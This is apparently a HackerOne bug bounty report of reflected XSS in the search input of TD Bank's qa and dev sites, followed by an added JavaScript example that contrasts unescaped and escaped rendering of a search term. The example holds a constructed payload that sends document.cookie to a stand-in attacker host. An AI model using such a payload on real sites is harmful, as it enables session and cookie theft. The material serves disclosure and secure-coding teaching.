TD Bank: Search input is vulnerable for XSS in qa.td.com and dev.td.com

HackerOne report H1:1861545
Reported by: allenshaji (hackerone.com)
Date: Feb 03, 2023, 17:09
Tags: td bank, search input vulnerability, xss, qa.td.com, dev.td.com, exploit, hacker, malicious codes, victim's browser, redirect, malicious website, cookies, bug bounty

Summary:

I was able to exploit the search input on qa.td.com.

Steps To Reproduce:

Go to qa.td.com and use the search option to reproduce this vulnerability.

Supporting Material/References:

{F2152622}

Impact

  1. A hacker can execute malicious code in the victim's browser.
  2. A hacker can redirect the user to a malicious website.
  3. A hacker can steal the victim's cookies, etc.
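The report gives no payload or rendering details, so the following is an added illustration of the bug class it names (a search term reflected into the results page unescaped), not code from TD Bank, from the reporter, or from the attachment. The sample query, the function names, the result-count parameter and the attacker.example host are constructed for this example; it runs under Node.js with no browser.

```javascript
// Added example: reflected XSS through a search term, vulnerable render beside
// the hardened one. Nothing below is taken from qa.td.com or from the report.

// Constructed attacker-controlled search term. The tag and handler are generic
// placeholders chosen for this example, not the reporter's payload.
const SAMPLE_QUERY =
  '<img src=x onerror="document.location=\'https://attacker.example/?c=\'+document.cookie">';

// Vulnerable pattern: the user-controlled term is concatenated straight into
// the HTML of the results page, so markup inside it is parsed as markup and
// the onerror handler runs in the origin of the search page.
function renderSearchResultsUnsafe(query, resultCount) {
  return `<h2>Results for: ${query}</h2><p>${resultCount} matches</p>`;
}

// Escape the five characters that carry meaning in HTML text and quoted
// attribute contexts. '&' must be replaced first to avoid double escaping.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: the term is escaped before it lands in HTML, so the browser
// shows the attacker's text literally instead of creating an <img> element.
// This encoder is correct for HTML body and attribute contexts only; a term
// reflected into a <script> block or a URL needs a context-specific encoder.
function renderSearchResultsSafe(query, resultCount) {
  return `<h2>Results for: ${escapeHtml(query)}</h2><p>${resultCount} matches</p>`;
}

// Narrow triage check for a captured response: does any element in the page
// carry an on* event-handler attribute? It is a smoke test for a reflection
// point like the one reported, not a general XSS detector.
function reflectsActiveMarkup(html) {
  return /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Regression check in the other direction: the fixed page must still display
// the user's query text, so the fix cannot quietly drop or truncate input.
function containsEscapedQuery(html, query) {
  return html.includes(escapeHtml(query));
}

// Demo: render both variants for the constructed query and show the check.
const unsafePage = renderSearchResultsUnsafe(SAMPLE_QUERY, 0);
const safePage = renderSearchResultsSafe(SAMPLE_QUERY, 0);
console.log('unsafe render reflects active markup:', reflectsActiveMarkup(unsafePage));
console.log('safe render reflects active markup:  ', reflectsActiveMarkup(safePage));
console.log('safe render still shows the query:   ', containsEscapedQuery(safePage, SAMPLE_QUERY));
```

When verifying a report like this one, capture the actual response for a benign marker string first (for example a unique word), locate every place it is reflected, and only then decide which encoder the page needs for each reflection context; an HTML-escaping fix like the one above is sufficient only where the term lands in HTML text or a quoted attribute.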